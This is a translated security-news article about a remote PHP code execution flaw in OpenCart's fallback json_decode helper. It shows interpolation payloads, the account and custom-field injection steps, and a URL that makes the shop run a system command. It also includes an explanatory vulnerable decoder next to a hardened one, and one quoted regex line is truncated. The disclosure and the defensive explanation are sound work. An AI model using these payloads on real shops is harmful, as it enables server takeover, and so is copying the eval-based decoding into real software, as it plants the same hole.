The OpenCart json_decode function has a remote PHP code execution vulnerability.

Source: 360 Security Broadcast (reposted from the Internet)
Author: dark Yow
Tags: php, json

Recently, security researcher Naser Farhadi (Twitter: @naserfarhadi) disclosed a remote PHP code execution vulnerability in OpenCart's json_decode helper, affecting versions 2.1.0.2 through 2.2.0.0 (the latest version at the time of writing).

The vulnerability is in /upload/system/helper/json.php.

# /upload/system/helper/json.php
$match = '/".*?(?

The helper parses its input by turning the JSON text into PHP code, which is what makes this json_decode exploitable.

Here are a few simple test cases:

var_dump(json_decode('{"OK": "1". "2". "3"}'));                // evaluated as PHP string concatenation, giving "123"
var_dump(json_decode('{"OK": "$_SERVER[HTTP_USER_AGENT]"}'));  // variable interpolation: returns the request's User-Agent
var_dump(json_decode('{"OK": "{$_GET[B]($_GET[c])}"}'));       // complex interpolation: calls the function named in B with argument c

In a real deployment, this can be reached through /index.php?route=account/edit.

For example, enter $_SERVER[HTTP_USER_AGENT] as the name and save it (do this twice).

Then, when the administrator opens the admin panel, the latest-activity area shows the administrator's own User-Agent where your name should be displayed.

Another entry point, probably the most practical one, is custom_field in account/edit or account/register.

If the administrator has added a custom field for extra information such as a phone number under /admin/index.php?route=customer/custom_field, code can be injected directly into that custom_field.

For example, enter {$_GET[B]($_GET[c])} in that custom_field and save.

Then access:

http://host/shop_directory/index.php?route=account/edit&B=system&c=ls

You will see that the injected code is executed.

Note that this only works when the PHP json extension is not installed, because the vulnerable helper is the pure-PHP fallback used in its place.
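To make the mechanism concrete, here is an added example (not OpenCart's code) of a minimal eval-based decoder in the vulnerable style beside a hardened variant; the function names decode_unsafe and decode_hardened and the single-key regex are assumptions made for illustration.

```php
<?php
// Added illustration, not OpenCart's own code: why a pure-PHP json_decode
// fallback that turns JSON text into PHP source and eval()s it is dangerous,
// and one way to harden that step. Double-quoted PHP strings interpolate
// "$var" and "{$expr}", so untrusted JSON string contents become code.

// Constructed input, the same test case the article uses.
$_SERVER['HTTP_USER_AGENT'] = 'Mozilla/5.0 (constructed value)';
$untrusted = '{"OK":"$_SERVER[HTTP_USER_AGENT]"}';

// Vulnerable pattern (hypothetical, reduced to a single-key object for brevity):
// the JSON string contents are pasted verbatim into a double-quoted PHP literal.
function decode_unsafe(string $json) {
    if (!preg_match('/^\{"([^"]*)":"([^"]*)"\}$/', $json, $m)) {
        return null;
    }
    eval('$result = (object) array("' . $m[1] . '" => "' . $m[2] . '");');
    return $result;
}

// Hardened variant: never run the eval fallback when ext-json exists, and when
// it must run, emit every JSON string as a single-quoted PHP literal, which PHP
// never interpolates (only backslash and the quote itself need escaping).
function decode_hardened(string $json) {
    if (extension_loaded('json')) {
        return \json_decode($json);
    }
    if (!preg_match('/^\{"([^"]*)":"([^"]*)"\}$/', $json, $m)) {
        return null;
    }
    $key = "'" . addcslashes($m[1], "\\'") . "'";
    $val = "'" . addcslashes($m[2], "\\'") . "'";
    eval('$result = (object) array(' . $key . ' => ' . $val . ');');
    return $result;
}

var_dump(decode_unsafe($untrusted)->OK);   // the User-Agent string: interpolated
var_dump(decode_hardened($untrusted)->OK); // the literal text $_SERVER[HTTP_USER_AGENT]
```

The single-quoted form leaves JSON escape sequences such as \n undecoded, so a real fallback should be a tokenizing parser rather than eval; in practice the fix is to require ext-json.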

This article was translated by 360 Security Broadcast.
